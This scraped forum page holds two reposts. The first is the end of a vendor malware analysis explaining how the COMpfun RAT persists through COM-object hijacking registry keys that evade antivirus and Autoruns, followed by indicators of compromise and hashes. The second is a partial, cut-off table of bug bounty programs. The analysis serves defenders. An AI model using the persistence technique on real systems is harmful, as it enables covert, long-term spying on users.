=YTo1OntzOjU6IndpZHRoIjtzOjQ6IjgwMG0iO3M6NjoiaGVpZ2h0IjtzOjQ6IjYw&parameters[1]=MG0iO3M6NzoiYm9keVRhZyI7czo0MToiPGJvZHkgc3R5bGU9Im1hcmdpbjowOyBi&parameters[2]=YWNrZ3JvdW5kOiNmZmY7Ij4iO3M6NToidGl0bGUiO3M6NTE6IjMyLWJpdCBsaWJy&parameters[3]=YXJ5IGxvYWRlZCBieSBGaXJlZm94IC0gQ2xpY2sgdG8gZW5sYXJnZSI7czo0OiJ3&parameters[4]=cmFwIjtzOjM3OiI8YSBocmVmPSJqYXZhc2NyaXB0OmNsb3NlKCk7Ij4gfCA8L2E%2B&parameters[5]=Ijt9"] The following screenshot shows the loaded libraries in a 64-bit process: =YTo1OntzOjU6IndpZHRoIjtzOjQ6IjgwMG0iO3M6NjoiaGVpZ2h0IjtzOjQ6IjYw&parameters[1]=MG0iO3M6NzoiYm9keVRhZyI7czo0MToiPGJvZHkgc3R5bGU9Im1hcmdpbjowOyBi&parameters[2]=YWNrZ3JvdW5kOiNmZmY7Ij4iO3M6NToidGl0bGUiO3M6NjE6IjY0LWJpdCBsaWJy&parameters[3]=YXJ5IGxvYWRlZCBieSBJbnRlcm5ldCBFeHBsb3JlciAtIENsaWNrIHRvIGVubGFy&parameters[4]=Z2UiO3M6NDoid3JhcCI7czozNzoiPGEgaHJlZj0iamF2YXNjcmlwdDpjbG9zZSgp&parameters[5]=OyI%2BIHwgPC9hPiI7fQ%3D%3D"] In both of these cases, we can see our dropped library. The processes use the registry key previously created to load the malicious library instead of the original Microsoft library Conclusion This new approach of persistence mechanism has several advantages: the attacker does not need to perform DLL injection, which is usually monitored by anti-virus software. Therefore, he has overcome one important security measure, in most of the cases. As soon as the infection was successful, Microsoft Windows then natively executes the library in the processes of the infected user. Hence, the attacking process is hard to be identified. Using COM hijacking is undoubtedly silent. It is not even detected by Sysinternals’ Autoruns. So, in our case, we have seen this mechanism being used combined with a RAT and this would mean a hassle for any infected and therefore affected user, as the attackers can spy on him pretty secretly for quite some time. But, obviously, this new persistence mechanism is not limited to the use of RATs. Attackers can combine it with any other type of malware, too! G DATA customers are protected: the latest scan engines detect the analyzed samples (see below). Furthermore, our behavior blocker technology identifies this threat and blocks it. IOC Registry HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\ HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E } Files %APPDATA%\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\ The file names are created using the following scheme: api-ms-win-downlevel-[4char-random]-l1-1-0._dl MD5 482a70b7f29361665c80089fbf49b41f (Trojan.Generic.11683196; Win32.Trojan.COMpfun. 88fc61bcd28a9a0dc167bc78ba969fce (Trojan.Generic.11671459; Win32.Trojan.COMpfun.A) 11f814e7fb9616f46c6e4b72e1cf39f6 (Gen:Trojan.Heur2.LP.dq8@aKnXWtic; Win32.Trojan.COMpfun.C) 671d230ae8874bb89db7099d1c8945e0 (Win64.Trojan.COMpfun.C) ---------------------------------- Side note: You are maybe wondering about the malware signature name containing “fun”. During our analysis, the [4char-random] value of the malware name was “pfun” and… yeah, we thought that this was ‘fun’ny, indeed ;-) Sursa: https://blog.gdatasoftware.com/blog/article/com-object-hijacking-the-discreet-way-of-persistence.html

[h=1]The Bug Bounty List[/h] A comprehensive, up to date list of bug bounty and disclosure programs from across the web curated by the Bugcrowd researcher community. Email address [h=4]Thanks to the 90 Legends for their contribution to this page. View contributors.[/h] [TABLE=class: table list-table fixed-header] [TR] [TH]Company [/TH] [TH]New [/TH] [TH]Reward [/TH] [TH] Swag [/TH] [TH=class: hall-of-fame] Hall of Fame [/TH] [/TR] [TR=class: active fame] [TD] 123 Contact Form [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] 99designs [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Abacus [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Acquia [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Active Campaign [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] ActiveProspect [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] ActiVPN [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active swag] [TD] Adapcare [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] AeroFS [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Aerohive [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Agora Ciudadana Security [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Airbnb [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active swag] [TD] Alcyon [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Altervista [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Amazon Web Services [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] ANCILE Solutions Inc. [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Android Free Apps [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Appcelerator [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Apple [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Apptentive [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Aptible [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Asana [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward swag] [TD] AT&T [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Attack Secure [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Automattic [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Avast! [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Avira [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Badoo [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Barracuda [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Base [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Basecamp [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Beanstalk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Bitcasa [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Bitcoin.de [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Bittrex [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Blackberry [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Blackphone [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Blinksale [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Blogger [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Box [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Braintree [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] BTX Trader [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Buffer [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] C2FO [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Campaign Monitor [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Can you XSS this? [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] CARD.com [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Chargify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Chromium Project [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active swag] [TD] CircleCi [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Cisco [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Code Climate [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] CodePen [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Coinbase [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Coinkite [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active swag] [TD] Commonsware [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Compilr [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Compose [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Constant Contact [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Coupa [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] CPanel [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] cPaperless [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Cryptocat [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Cupcake [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Customer Insight [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame new] [TD] Dato Capital [/TD] [TD] Yes [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Dell Secureworks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Detectify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Deutsche Telekom [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Digital Ocean [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] DNSimple [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Downstream Analytics [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Dribbble [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Dropbox [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Dropcam [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Drupal [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] eBay [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Eclipse [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame new] [TD] Elance-oDesk [/TD] [TD] Yes [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] EMC2 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Emptrust [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Engineyard [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] EthnoHub [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Etsy [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Eventbrite [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Event Espresso [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Evernote [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Expatistan [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Facebook [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] FFmpeg [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] flood.io [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Flowdock [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Fluxiom [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Form Assembly [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Foursquare [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Foxycart [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Freelancer [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Gallery [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Gamma [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Gemeente Wageningen [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Gemfury [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] getClouder [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Ghost [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Ghostscript [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Giftcards.com [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Github [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Gitlab [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Gittip [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Gliph [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] GoAnimate [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Google [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Greenhouse.io [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Grok Learning [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] HackerOne [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Hack For Cause [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] HakSecurity [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Harmony [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Helpscout [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward swag] [TD] Heroku [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Hex-Rays [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] HoneyDocs [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Honeywell [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Hootsuite [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] HTC [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Huawei [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Hybrid Saas [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] IBM [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] ICEcoder [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Iconfinder [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] iFixit [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Indeed [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Informatiebeveiliging [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] ING NL [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward swag] [TD] Instagram [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] IntegraXor (SCADA) [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Internetwache [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] ITRP [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Joomla [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] jruby [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Juniper [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Kadince [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Kaneva [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Kayako [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Keming Labs [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Khan Academy [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: 